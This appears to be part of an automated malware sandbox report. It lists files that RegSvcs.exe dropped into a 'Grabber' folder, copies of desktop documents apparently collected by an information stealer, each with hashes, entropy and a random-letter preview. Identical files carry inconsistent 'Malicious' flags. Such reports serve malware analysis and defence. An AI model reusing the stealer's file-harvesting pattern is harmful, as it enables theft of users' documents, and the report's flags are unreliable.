Preview:	BXAJUJAOEOZPYQVMPMMPXXMVCPSLTTLUOLYYQUQKLRMOQNFWEOCYDOLITPCVDLYSWYQACZEJIDILMNOOUVEVBOSWPXYLBOGFYWHZVFNHRJXYLODFWJLFJKMUXRMLQJAGMERGOWKSMBXUJUMRUBMROMDBISUWTFWPXBVVSTBYHRHUOKCJNGMCOLUFOVLKFFIUZHRPZUITDNNTTEJKTUSBPVEUSTDXHRMZNWZQSUEGRYELXBLVKZHEIVACMOHJWFJRPJKNIDOXZHIEUDGLSGKALGUCHSOBYGTVWDOVYUEMXJWYDCHTXKLWDJLIZFFBQOMRYKZVRXZYKIPKCJEYOVOQCGFXCUNQKHYBXFYRGYUQAUKMCSQKKDJIQWKZEWMJWHJDDENKZLPNJAJLVIEXHEGVFHRIOBAWGXOXLQJIISBHZZGJYZBYNUOKMCKTICSMRTMZVLKMZTCWKHOHWQBKEBGEASMMYEGDDSCGDTYEPANLCQSJIRCTCUHXIVGBREMBTULUXWAZISUYERUZPWQLRSPPVNCMSPDUHQTJKYNEEWYIFNUCJJSDFDNQJLWDBLURDBXKLJVMGWUBKEXPYFIJNWRSUNUJBZAWJQEZWEYFLNXWPKFJZFMVPYOJFFUYCTEUKFWSOFUOTKIGENNTAAXCAHPWQNKMKKGNWIOGZOBPOTDAQLZSIGMQTNQVGQJNNITTRMOHBPCHTGJANZTLZHNSTOQXJKIAZXWPQWIDJXZUURGYMTMZTWQNTRVEKAAWBRZQWZYVWKWEVAUTRSOXDHWSYIZYRJFVXSPNFOTDNAGHDFYSAEEFBXGQQGYMZHMQHZTDMNYXDQJKMLAXJWCBQUIKQFEPVZNRMOWEKGFDLUJLSXRKKJUIGCSCGZTXLHOWGMKDLSQHDWSPCYROUJEHKXBJSADOXSOMTTUGHDSOBTNUEDCBNWNIDSDBZKBGFCJHQNDVAAZTKEIMDCTKNOQUKPNHEQOBANQSCJQRQBRAIBBXRYTT

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Desktop\GLTYDMDUST.docx

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69569301223482
Encrypted:	false
SSDEEP:	24:P1aJ3UFXnPRRqJn5Ao7J4kXjiut748cX3Gg6hQk:P1aWFX5RQnAuh48cHGg6hQk
MD5:	CA404BEA65D84F58838AF73B2DC67E02
SHA1:	56EDE3A3BF70705B1D42A2AE13F6605057C1E5F6
SHA-256:	4A28C898DF5967827C26FD633CD56275159EF4C4C0193E484E8E8F3E9ECC66B9
SHA-512:	10C144317CDB5A368733346EB8440A986A377916F98BE0E8232E668A8C5E107E06829ADF575751B94D0B0AA37F4CAC48DBD7BC64FFE8DCB140FB033C00CEC721
Malicious:	false
Preview:	GLTYDMDUSTFARDVTDTOSUXWTZPBTWYSDUWRWNQMOYZIOPMOCUVTIJOHJYLHKBCEDWQBIYLQPLFXNZVXOZBIBDNIIHCNZHRIZBCANIAZPBFFJNXGCWLILIHHCYJHZSFIZUUDHFLQEWBBOMWJOZCKSAOAVKAWDPLPLVPHHMTSMKFCHYLMZJYKTJZUGPCSSVJJOKBWSTSLHJSIZZNIHOVEXPMQSKABHGSGHFUWVNTWTGYCLXOQEPAIEYRMLWJNNZHEPKXAHFKJUQHDHBHMPKXFCHXQYMICUKIVHNMPIJURPFBDBUQWHFTUVKPWMJHVOENGHYYNPMJPLPTQKABBVHNTLFXAJUISPUCEXPQFWXNQKGLSPRPJEAIJQZNYNOWAKNLRQHQRIOFXWLXEJZPOKNRPRZQJIGYXOWWZDFNURUOTFOOSKCNYLZXJZIWHYYUTOQRDTTRMPEMHZSRVZISBDQKRQYXAZOKOCTHUJKZWNHJSEMHTCSKCARZUYORNVIXVWTGAWUONMQVDITNHLNLJNREIEBPKELOMXBMEUBFTSVSGBVXSXHICRIGHIFVXWPXMIKKKCBOFCJGKJYZJDAWFCHWCNIMOPOPYUXDESMSSFNZBKRVTKTFPFGCIMVLKPBRKBRZJRHIYUQFAFEODGJZAXKRAFGTBXKKKTOXYTJBCHZWBDPBSBRTICVTUOWNEXJIZFESQAIMINDZJFLHIQSMVIICPGSEVSLVSVPMBXUGAPVVXVNJEBHRRBRPIHKGVJJDRANYKMMFJJBFPKFDJAROFBZANTWLCLSELNCCDRQUPZIMXLCVFZOFWKZYXCLQVRUFHUTIFPNWERRWWXHSVZHEYMHULWKGIIWKBRWODYKIGEPXGOEZXMJVKVNTEOQXZBOZBXYKMUGZUYMELGGHJJVDPONTLTQGITEMXYMMOGRWMQDUHIGHPJWPGIEZDZPFZHQMQKLTBUGJXLBLEGTFQZOXBPYRZFHNMZGVZGRAKFYTWDWWKV

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Desktop\GLTYDMDUST\GLTYDMDUST.docx

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69569301223482
Encrypted:	false
SSDEEP:	24:P1aJ3UFXnPRRqJn5Ao7J4kXjiut748cX3Gg6hQk:P1aWFX5RQnAuh48cHGg6hQk
MD5:	CA404BEA65D84F58838AF73B2DC67E02
SHA1:	56EDE3A3BF70705B1D42A2AE13F6605057C1E5F6
SHA-256:	4A28C898DF5967827C26FD633CD56275159EF4C4C0193E484E8E8F3E9ECC66B9
SHA-512:	10C144317CDB5A368733346EB8440A986A377916F98BE0E8232E668A8C5E107E06829ADF575751B94D0B0AA37F4CAC48DBD7BC64FFE8DCB140FB033C00CEC721
Malicious:	false
Preview:	GLTYDMDUSTFARDVTDTOSUXWTZPBTWYSDUWRWNQMOYZIOPMOCUVTIJOHJYLHKBCEDWQBIYLQPLFXNZVXOZBIBDNIIHCNZHRIZBCANIAZPBFFJNXGCWLILIHHCYJHZSFIZUUDHFLQEWBBOMWJOZCKSAOAVKAWDPLPLVPHHMTSMKFCHYLMZJYKTJZUGPCSSVJJOKBWSTSLHJSIZZNIHOVEXPMQSKABHGSGHFUWVNTWTGYCLXOQEPAIEYRMLWJNNZHEPKXAHFKJUQHDHBHMPKXFCHXQYMICUKIVHNMPIJURPFBDBUQWHFTUVKPWMJHVOENGHYYNPMJPLPTQKABBVHNTLFXAJUISPUCEXPQFWXNQKGLSPRPJEAIJQZNYNOWAKNLRQHQRIOFXWLXEJZPOKNRPRZQJIGYXOWWZDFNURUOTFOOSKCNYLZXJZIWHYYUTOQRDTTRMPEMHZSRVZISBDQKRQYXAZOKOCTHUJKZWNHJSEMHTCSKCARZUYORNVIXVWTGAWUONMQVDITNHLNLJNREIEBPKELOMXBMEUBFTSVSGBVXSXHICRIGHIFVXWPXMIKKKCBOFCJGKJYZJDAWFCHWCNIMOPOPYUXDESMSSFNZBKRVTKTFPFGCIMVLKPBRKBRZJRHIYUQFAFEODGJZAXKRAFGTBXKKKTOXYTJBCHZWBDPBSBRTICVTUOWNEXJIZFESQAIMINDZJFLHIQSMVIICPGSEVSLVSVPMBXUGAPVVXVNJEBHRRBRPIHKGVJJDRANYKMMFJJBFPKFDJAROFBZANTWLCLSELNCCDRQUPZIMXLCVFZOFWKZYXCLQVRUFHUTIFPNWERRWWXHSVZHEYMHULWKGIIWKBRWODYKIGEPXGOEZXMJVKVNTEOQXZBOZBXYKMUGZUYMELGGHJJVDPONTLTQGITEMXYMMOGRWMQDUHIGHPJWPGIEZDZPFZHQMQKLTBUGJXLBLEGTFQZOXBPYRZFHNMZGVZGRAKFYTWDWWKV

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Desktop\GLTYDMDUST\HMPPSXQPQV.png

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698711683401115
Encrypted:	false
SSDEEP:	24:qKHpKPokvebe5xXL3g76mBU/gS2JBbl20IS7pnXk:Rpcjnxbw7TYgS2nbzIS7pnXk
MD5:	47643CE7571E0C995094D7CE5F2005D7
SHA1:	40D42828B2F68C625EBD884FB8AF5B20F5A1DF9C
SHA-256:	1D642D4EC7BC821B0FFA28C3F2702C875C922139D8001EADD664EBCCF8D321B3
SHA-512:	3AAD0470C01D2609662C0B8D146BA79132B404C669C22032D085233E2D30725797AC2E15A11F54DFE00E4B6CA6E914E3439D4775B3AF6D782334FE9424F485A5
Malicious:	false
Preview:	HMPPSXQPQVZTKYGXRLZXZQHGCZSWFSMKAZTFZQVPBWYDEIQOYRZBKZROCVLLNDGOXMZATHCHJWBWCKMDMUVOMUCFYNBSIKMCOOAGLUHDSCAREEEQGTRYCAFLTFVCHREFHJJALACUPWFTGZJJVRRQBVOZGXIEUBTJBNHNAXRWAWTUYQZIZWPARDBZBFGZUBQQPINOCLFOLDPTMWQVUUBDSNGDFVMEOTHPNKBOMDPGLFXUXBXHUOTYRPUQTUJPKLUSNTISPNFAHVFBBWEWJQFBJFCDDWUUKCQJNEKMUTJEZKKMXXOCBOVMCGGYTPDYBYYFVGHQJJBCDHYWPXJUJWPNURQCUHPTATLFRAOGUCJWWSBAITHVPDRYRFCTPIWHJVKSAXOIPKHISTBCDZISGIVPPYDJLJWFRNVNCWIOINKYQLAFVLCPSGCZABGNTUVGEDQZGQNDECUBPLLOYUYTHXDNNCAXKLHFZXBBAWBICFREGZBLZZMPWRLUSXUNEXAKLSJETGNCJTTGSNPPSHZUKZDHHYHBBWKJUSIBAKGKHQJINZHCWLBCIIUGTVVLNEZXUBIPUVRAILLENTRJYFNIBHNOUNYAIFQBNUMFUSXNGITFIFZKTSFAQXDYVBIUCIUYJIGJTIJHWTPPRJQVSBHHUXLZRPPJOWJAPSVQQVKLFHKXZRPEJBFXNKVNBCPMLRQGCJINKLLBJVROFAFCDRFCDAMIDEYSZDWNLUMJZXGWKOIKNAYVXPYRZWMBNAAFKFOPCVNGUECOARMDWJVYVUQQAFEGKCYXVVGXPHPEVOMRADTQDTJSHAKHPNNOGUDWBRXDJFEMSJTJUJKHZONBLGDCDDUDTRQKPOFACELSKHFSBPKXKDGWOKSDBAMWLKXEAOOHWVOAQZGZCNSDWOXSHPTFMVMYQXTRNMUPZSFQXOQLPUFJWHWTXXIRMQXDPVAJKHMSCGTFVJKECYILRMHGFBWQKUNTRVZTBJQJAKTSJUIDOLPL

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Desktop\GLTYDMDUST\LFOPODGVOH.pdf

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698393795110914
Encrypted:	false
SSDEEP:	24:weX7B5oYsT2B9e4Feb4OKL65JIiga/zOnv9iY81icgfiTetEc8E:FPoYsqB9e4dP63IigGOvo11LetEc8E
MD5:	7C5655873C22D2522B13B34841F82038
SHA1:	ED733AE5B3E813B97D69E7283AEB8085EFC62B78
SHA-256:	9A515FAA0EE108930EC0C597C9E2CA74B21C3C9D45F3F845954A65F3FA4C494D
SHA-512:	A98C25203B5A8C5C3FE7859E1B128BA3C0B5691BE716C53CA427770F10EC65CBB8B704EEA994BCE1ECA69EC4D46BCC0D48FE844653B964E96D1248D2E211CBD2
Malicious:	true
Preview:	LFOPODGVOHLLKBCXZQUOXPFEKGPKVDEYIZRZGQPAXXVWAHGTCBCWCYBHYOPHLEVYFLCEXNMVAAPUECIPRDZTIBJFGFXDAEMKYPYGCWSRTCUEEDISUDHVYQEPCSIKRBOXVZVTBFVUQHQYHEIWQPMZFNXNKGPPDGDMKJWAYJVYMRCYCWORBYPZYIFTAANBVDPJJOGYMYDPMPCNSOQVKLKNKHQVJQRYOOACYXVWFBJGOZRXUBDUSJEQNJXCVPHTUWAVCILOAXOWIJVWKMAIOEWTHGQELYIGVJJZNFBDSZXPZMLZNFDRIJQQQDSSMCBEMRHVOYIGRXSYQYDLBDBDJCVRREJGRUBPNYBFUCUXLMUIULULHCWJQQEMKBQMLJBDJQHFXPNODSTVZXWZZOXPIXKBRKMKOYEBDUBYOGMGXHFMCUIKRQYQMHGUBUAAFTMUCZNIIVAIOOBIASAJPKXIYIQIRVIIXGNUEDAXQJYWQXOBTAINKSTSHZGNUWVHVDUXVGWBWRXOYEGSIRNXRHBFOAWRQVFKAGDUSHRWQWJQRNMOGHTWFHOOZGRSVCSEJNMPDYUGTSBOMGHSHACUNTVVGKNAZSSLLQOXMCBVKFFAQLQCWYNIWPVJRECIKVCXZGCNHKXMQDPPOURAWIKZOZEFLDUYVIGDPGUMGOGBUYKGLVLWQSDAHAAIVFUNWQIWKRCSLCPMZBWBBDTBBVTZNYCLEIZNLQRHKBOLVTUTWSURDWQTCHAPUMJQWNVWVGFLAAPEHMLBUSYJCZDJUMZMKIOKIMVTYPMCXUXWVXIMVUCNXESHIVCKNFAALGDXCVJHQZWLDSAWNJWFBTHDBKGVKXLWDOPOOBJMPJCKUXVNFQVOUEIHJKOHTDCQCDOFQBMSQNWVDKTKWJIFVOMWEUJULPMGUSEWAZAHAZVGRSWNQYXPMKFWQGODZHVNOEXZBPLONONBPAHCDWEMSFLRJBFMOKMCLAGRJEGRTGVETXSZKDXQWEOD

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Desktop\GLTYDMDUST\LIJDSFKJZG.jpg

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69486718145169
Encrypted:	false
SSDEEP:	24:XvKYeI9D5UOyoiaxIKgpZ9ONvMyTONN5ZjJH1U:yyD6yxILZ9OtTT+XRG
MD5:	E63B196AE0D5F7670244FB1347D75EFC
SHA1:	1C17108AC7E5263674836BAD67AE44D8C3C6890B
SHA-256:	D8C0D7B9CDFC72CAAB0A7687299B6734708E98C6DD088CDB0FF1A659E294B49D
SHA-512:	63345352964E1BD19AC843F82820E9B29C5BA991A002AB9B3164E1AA10B6D88BFA0DFAFA2E91E584835BA89B6A1770140AC14EA0B4B64E6C3BF8CDA34C9698AC
Malicious:	false
Preview:	LIJDSFKJZGBDGXNCCVBULCELYCDFJRIXKMFPVDHHKPYEYOXKFYMNEETRQHXLDRVBOTNERMYOYUJOPHUSKFPWBGKNJYBGZTTHNKGNUZWATSMORYBOIKBFSVUUMZNDYXOYKYUKGRNFVRQOPBEEIPDGTPBXCNLKHMGPHFCEQOUTEDGJZTMFUUGECZETRSODGZCJVQEAMRZADPDVQRANZOSHTGPOXPXGXXQDJVYZOCNXDECWJISPPIJOZUBSSKPGODUHTISNESPZRLELINJJYOXSBFTVUDENIBRDIMMGFIQNDGUSXDBHQNJRYLFTZGOCELKZGOQQKNDPFAMTXHBKHJYXYEGLJLANRMMTCVEFYRTWLXIMCCHDWVOLGVUWRNLSIBMLMBKVSYLKXRTMZROHVHCRDBCODTPNVQMBPRJGBGOOFVGDIERMXUFETJQWDXSQQFMQAZGGRVNRCUOAVYJDIMQETJOANIIDEGJCHEFRSNVBQAQBBUTTMXBTJXRHLSOCTPPBIKPXITOOCINTVZYAVQLVOOZWSOPLYJPOTKFKIKEHIDDPCDDEPKVDYQAVTVBFYYWCGUKGIDVLQSIPXISDEDNJWONTSILFUGUYMKQLKEJGOOCBYSXDFHNFHHWGLXWWQKSSOHSSTZLRZVRHZVBZGGEZQFSIWQQPMILSPBAMPAGAHHVJJCITDTJRZTRBEXSXOVDKONGLMSWBAOOYAFISJHKEYUKIWXBFUDUMVQRELEPVTNQBALAQOEAEFVPIKNYIPNICGKQFRVXNQUEFULLOYWMHOMUFEMHYNKNWMAOBGWSECZOKWISDOIKSUVWBGWPNAMFUHBRWEJQPHFPEKIRLAEPTBNRQEUVXXIZSSOOEFEETUMNPSVEAKOXVYHAOIXBEYBVXDJXZCNDVOPZLARFFUSXUOWXQBKDLINBWBQLXLHHNIXZEPCNHFEIZUZSTXWFUITSBKYSELMNKNBBDQMNLAIOSKYHCWGFPNUXAFSRHOWYH

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Desktop\GLTYDMDUST\UNKRLCVOHV.xlsx

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698999446679606
Encrypted:	false
SSDEEP:	24:W9l1TKf/7G6pHxojyPqnhSz0hujim56BAhI8QR9QlFpd:6l1uFqyP5zY5moAoah
MD5:	73351F70BFEF33BEEA9E1CC192801D02
SHA1:	ACFD9C2DFA1B38FAB53EEB4730B0DF0551B45D8C
SHA-256:	F6917A805A90AC72064D294E5E0FBA4604588F7B0EB2B3A3511D1FC6887E3E24
SHA-512:	56D46FF29F86F3B314EBC6CC456A1D153D0F1245A926F82AE7FA9A6A5AD792094FEDBB5FC489929186C8A72732BE4EAFF3BCF2E508B8B2FC50B013E6166B212C
Malicious:	false
Preview:	UNKRLCVOHVAXPHOHAZYDIMBTYYPLYBYVUEQLGGJJCFCITCEMGOMMPTCXLGLYUZHZWMTUNUOFUUYAUDMSGBWJKAMIFUAYTDIKVYQPGYQSIZTANWSUNZDHBRNONSOUWVUJZFBPOZIMZOUPVAYJKSJULUHYRYUUOLYWEWFCYAZHMJKHXUZLTHEXFDNRXIUQOZHGGMDFHSXAJKHPBRPJJKVVXGMDIMEMMFXEOBQJSMYSSMPVSVUNJLJSSMEFHHLFEVPWZDDEIKQGOJPOJWTWMNPIEQXWXOBLNLDRNRUGDUXCMTURFAWMSSYAENGRWRBIJOYJNUMDYXNDETRQMYAMGJYZKZQPFPCONTLPPRLYMQJPIWCAXNOLGZOTNQEWQGBVSNORDVIXIUJAENWBXHSXSDNAMBAXUDBRCRHHYFJQLZEAGFZJUFMBIUBABNXVYITYPKRJUMGDPPABWBKNLHDKPLRUIRQXXKLFZAHHOQZHNTUNORTHIPKRZRDGRVPKIZRHYAGOVNDISDQRFXONCHILLZJTGXRZPEIPHKZXDBODDSUZIKNUVTNMZGVZQILJHRYJYZKDBLCLJFWSXRREYFFMEXBICHNCCTBTTTTZZVMSHPBKJMXPXFJNIDQFSJDMCXXUZPFVBFVKYCVFVQFUVOJWWIUNBICQVZGOZZVDJKKZTGDLWXADCBHYGUDWYWTYVYOOICLDGZXJHSTPFGQBMRCCCBJSXCPVVBKRNYTLTAOWPNJFKXUXQORRVHCHMSRAHQHFDEMZUFOFJOQFXHQBLWKNHXKEBLUJMQCFCSTBVXKUUPPXZNEWBUZPPVJFCDLXJEGEZSQSHHBNUCTRMEDMGPNZBHGEXVTWWZFELEFQQWXGHSVDMBAGZANSOHWAGHWRFCVNRSBOOZFJQONOYPNXBMHJINMGSGLMUSTAOMZXKOIHFYYSJWELBRBKMJUVQKVVFUFLDZKJVPCATVIHCISAYNPTMBEUQYJRYFUSBKOSITLVDUTJ

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Desktop\HMPPSXQPQV.docx

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698711683401115
Encrypted:	false
SSDEEP:	24:qKHpKPokvebe5xXL3g76mBU/gS2JBbl20IS7pnXk:Rpcjnxbw7TYgS2nbzIS7pnXk
MD5:	47643CE7571E0C995094D7CE5F2005D7
SHA1:	40D42828B2F68C625EBD884FB8AF5B20F5A1DF9C
SHA-256:	1D642D4EC7BC821B0FFA28C3F2702C875C922139D8001EADD664EBCCF8D321B3
SHA-512:	3AAD0470C01D2609662C0B8D146BA79132B404C669C22032D085233E2D30725797AC2E15A11F54DFE00E4B6CA6E914E3439D4775B3AF6D782334FE9424F485A5
Malicious:	false
Preview:	HMPPSXQPQVZTKYGXRLZXZQHGCZSWFSMKAZTFZQVPBWYDEIQOYRZBKZROCVLLNDGOXMZATHCHJWBWCKMDMUVOMUCFYNBSIKMCOOAGLUHDSCAREEEQGTRYCAFLTFVCHREFHJJALACUPWFTGZJJVRRQBVOZGXIEUBTJBNHNAXRWAWTUYQZIZWPARDBZBFGZUBQQPINOCLFOLDPTMWQVUUBDSNGDFVMEOTHPNKBOMDPGLFXUXBXHUOTYRPUQTUJPKLUSNTISPNFAHVFBBWEWJQFBJFCDDWUUKCQJNEKMUTJEZKKMXXOCBOVMCGGYTPDYBYYFVGHQJJBCDHYWPXJUJWPNURQCUHPTATLFRAOGUCJWWSBAITHVPDRYRFCTPIWHJVKSAXOIPKHISTBCDZISGIVPPYDJLJWFRNVNCWIOINKYQLAFVLCPSGCZABGNTUVGEDQZGQNDECUBPLLOYUYTHXDNNCAXKLHFZXBBAWBICFREGZBLZZMPWRLUSXUNEXAKLSJETGNCJTTGSNPPSHZUKZDHHYHBBWKJUSIBAKGKHQJINZHCWLBCIIUGTVVLNEZXUBIPUVRAILLENTRJYFNIBHNOUNYAIFQBNUMFUSXNGITFIFZKTSFAQXDYVBIUCIUYJIGJTIJHWTPPRJQVSBHHUXLZRPPJOWJAPSVQQVKLFHKXZRPEJBFXNKVNBCPMLRQGCJINKLLBJVROFAFCDRFCDAMIDEYSZDWNLUMJZXGWKOIKNAYVXPYRZWMBNAAFKFOPCVNGUECOARMDWJVYVUQQAFEGKCYXVVGXPHPEVOMRADTQDTJSHAKHPNNOGUDWBRXDJFEMSJTJUJKHZONBLGDCDDUDTRQKPOFACELSKHFSBPKXKDGWOKSDBAMWLKXEAOOHWVOAQZGZCNSDWOXSHPTFMVMYQXTRNMUPZSFQXOQLPUFJWHWTXXIRMQXDPVAJKHMSCGTFVJKECYILRMHGFBWQKUNTRVZTBJQJAKTSJUIDOLPL

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Desktop\HMPPSXQPQV.png

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698711683401115
Encrypted:	false
SSDEEP:	24:qKHpKPokvebe5xXL3g76mBU/gS2JBbl20IS7pnXk:Rpcjnxbw7TYgS2nbzIS7pnXk
MD5:	47643CE7571E0C995094D7CE5F2005D7
SHA1:	40D42828B2F68C625EBD884FB8AF5B20F5A1DF9C
SHA-256:	1D642D4EC7BC821B0FFA28C3F2702C875C922139D8001EADD664EBCCF8D321B3
SHA-512:	3AAD0470C01D2609662C0B8D146BA79132B404C669C22032D085233E2D30725797AC2E15A11F54DFE00E4B6CA6E914E3439D4775B3AF6D782334FE9424F485A5
Malicious:	true
Preview:	HMPPSXQPQVZTKYGXRLZXZQHGCZSWFSMKAZTFZQVPBWYDEIQOYRZBKZROCVLLNDGOXMZATHCHJWBWCKMDMUVOMUCFYNBSIKMCOOAGLUHDSCAREEEQGTRYCAFLTFVCHREFHJJALACUPWFTGZJJVRRQBVOZGXIEUBTJBNHNAXRWAWTUYQZIZWPARDBZBFGZUBQQPINOCLFOLDPTMWQVUUBDSNGDFVMEOTHPNKBOMDPGLFXUXBXHUOTYRPUQTUJPKLUSNTISPNFAHVFBBWEWJQFBJFCDDWUUKCQJNEKMUTJEZKKMXXOCBOVMCGGYTPDYBYYFVGHQJJBCDHYWPXJUJWPNURQCUHPTATLFRAOGUCJWWSBAITHVPDRYRFCTPIWHJVKSAXOIPKHISTBCDZISGIVPPYDJLJWFRNVNCWIOINKYQLAFVLCPSGCZABGNTUVGEDQZGQNDECUBPLLOYUYTHXDNNCAXKLHFZXBBAWBICFREGZBLZZMPWRLUSXUNEXAKLSJETGNCJTTGSNPPSHZUKZDHHYHBBWKJUSIBAKGKHQJINZHCWLBCIIUGTVVLNEZXUBIPUVRAILLENTRJYFNIBHNOUNYAIFQBNUMFUSXNGITFIFZKTSFAQXDYVBIUCIUYJIGJTIJHWTPPRJQVSBHHUXLZRPPJOWJAPSVQQVKLFHKXZRPEJBFXNKVNBCPMLRQGCJINKLLBJVROFAFCDRFCDAMIDEYSZDWNLUMJZXGWKOIKNAYVXPYRZWMBNAAFKFOPCVNGUECOARMDWJVYVUQQAFEGKCYXVVGXPHPEVOMRADTQDTJSHAKHPNNOGUDWBRXDJFEMSJTJUJKHZONBLGDCDDUDTRQKPOFACELSKHFSBPKXKDGWOKSDBAMWLKXEAOOHWVOAQZGZCNSDWOXSHPTFMVMYQXTRNMUPZSFQXOQLPUFJWHWTXXIRMQXDPVAJKHMSCGTFVJKECYILRMHGFBWQKUNTRVZTBJQJAKTSJUIDOLPL

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Desktop\HMPPSXQPQV\BQJUWOYRTO.jpg

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.68639364218091
Encrypted:	false
SSDEEP:	24:P4r5D4QctcBd3LMDzR8JwOlGpXSmDbvy5z5hu/KBdAmHtTQ:P49StmdbMfR8ApSmnvyXhuCBd3ts
MD5:	1D78D2A3ECD9D04123657778C8317C4E
SHA1:	3FAA27B9C738170AEE603EFAE9E455CA459EC1B7
SHA-256:	88D5FF8529480476CA72191A785B1CCDB8A5535594C125AF253823DD2DC0820E
SHA-512:	7EA58B30CB5FDA1C4D71DC65DF64FD9703E81DDCBAD9DA5B405CBBEACB9197A6E8B933C844289D7852801B6A5BC545C4234DD69E85F0AF640F5BC51BE5DDA12E
Malicious:	false
Preview:	BQJUWOYRTOLXZEKCXDLSWRNMFMCSYXRPFWPCFOMLTXRLOYSWDYNKGJBBEKHPTUBSJDZWIUKDQVTQQAEIJPJKOPTWULSKKXLSOLVYRREVXVSZLFQQBXKKCMYLLBRWPJMBHNBFTQUBUPFYXLIARNGQLIDNRZYVXHIWZXDZUYNJJXBTDFJWBKWCQQGPRFDTAZULKSSEFZTUDJOKODZLAIWAICBXNPXUMZFRUVBQDJIENEPBRWTDBODAVKDNOLRNYNBKKQBPGBUTIJCMZXSCKDRZIHJDDUPOXQOJQXAOMBHVIUUZBSRKPYCRBAHBBGKXGMODRWMTAMVEFAPKYMHWCUCKKJSLQYPIMPYZKZKPIXSZAPTLQLZGQHTXZBXONOWDVDWQMPDILYOIVFKXBUSTSFUGKZZBFUUTDDOMVPOINIMBFTSGRRDLSLPUXATPQGHCHIJRAGXNYBQOTZSNMAZCEDHOUMBJWJSCXGDMRQCIYNBQTBGKDTCTKRJCRXWGYTZRFYVOFBTBDYLRCDVRFBCHFMPWSBHHWRRLBRKCLDQRSMCLVZAGFMWLPHYJGALXNLZXJVWWXBFHYIZDZFXDBTHZKRDQBGOXOULNHYYUXXATXCLPLWIUBSSSLNJBTSMXAWVUVUVKDAOHXCIVGHJLVIETMJMFWUZTFVNALCFBKNUVWGXUEPDHVHGOBZRVOPDFCORECRQJIXMUFIACDLBMTHCLLXOISHLMFTEBKUAICYBSNGCASKNQBLIPLSIPNJTWJLGARSXDGLOKVQSUASJSIRFNLKQTPVOVXSGKMXEEUVWMULGSMRQRMICWPXBVELHRSUIIUSGMSRWNPMSLNFKZWDRGGAVGKNPMSZMHRWAKTDXUHZPMIYCRABYQLAAVOSTLMEJGFHJSMBRQBEICTCXKKZHNUWSZMQZHAMPRHAWDVATODUFFRHCHJYGQZNMBWVRFZTJLSUUUMCUEOZEUMCJAOLHOIJTNPLJBASLIHCUCMVTUNIOK

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Desktop\HMPPSXQPQV\BUFZSQPCOH.png

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692335641801684
Encrypted:	false
SSDEEP:	24:zH8U6ceY5aV+Ai0xV38519ItLI1uSTaTtR4kYO9TsrMA7PTOGil5:QlUMHi0xVsrsLcn2hmYA7Pc
MD5:	DEF355B17D73C1495713C5488FCE7339
SHA1:	BECA340E4F9D7795A83636020FCF688DA88FA808
SHA-256:	471A7B08733F8B9E8AB162FE426B75361169906D3DD7564B28B19E4DBA14F328
SHA-512:	E95418C8C9F1A763D004E2572EF9D4379878FDD9D222E4605D7A77ED6D86CC764B68B358A7DFA8ED82749B24ED97FCC81139694A031E9B85032AF6CC1F973F67
Malicious:	false
